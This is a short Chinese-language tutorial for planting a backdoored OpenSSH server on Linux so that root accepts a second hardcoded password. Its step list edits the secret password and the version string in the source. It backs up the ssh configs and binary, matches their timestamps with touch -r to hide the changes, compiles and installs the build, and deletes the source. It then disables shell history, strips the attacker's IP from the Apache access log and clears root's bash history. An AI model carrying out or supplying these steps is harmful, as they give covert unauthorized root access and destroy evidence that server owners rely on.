Linux SSH后门
可以让root账号有两个密码,不影响管理员正常登陆。
在includes.h 里面 修改密码,然后编译 安装.
- unzip sshd.zip
- cd openssh
-
- vi version.h
-
- #define SSH_VERSION "OpenSSH_4.2" --> you've to edit OpenSSH_4.2
-
- vi includes.h
-
- #define _SECRET_PASSWD "123456" --edit as u wish
-
- cp /etc/ssh/sshd_config /etc/ssh/sshd_config.pub
-
- cp /etc/ssh/ssh_config /etc/ssh/ssh_config.pub
-
- touch -r /etc/ssh/sshd_config /etc/ssh/sshd_config.pub
-
- touch -r /etc/ssh/ssh_config /etc/ssh/ssh_config.pub
-
- cp /usr/bin/ssh /usr/bin/ssh-keypub
-
- touch -r /usr/bin/ssh /usr/bin/ssh-keypub
-
- ./configure --prefix=/usr --sysconfdir=/etc/ssh
-
- make && make install
-
- cp ssh_config sshd_config /etc/ssh/
-
- cd ..
-
- rm -rf ./ssh*
-
- rm -rf openssh
-
- diff /etc/ssh/sshd_config /etc/ssh/sshd_config.pub
-
- vi sshd_config
-
- diff /etc/ssh/ssh_config /etc/ssh/ssh_config.pub
-
- vi ssh_config
-
- touch -r /etc/ssh/sshd_config.pub /etc/ssh/sshd_config
-
- touch -r /etc/ssh/ssh_config.pub /etc/ssh/ssh_config
-
- touch -r /usr/bin/ssh-keypub /usr/bin/ssh*
-
- /etc/init.d/sshd restart
- export HISTFILE=/dev/null
-
- export HISTSIZE=0
-
- cd /etc/httpd/logs/
-
- sed -i '/ip/d' access_log
- 登入后门:
- ssh -l root ip 密码:123456
- echo >/root/.bash_history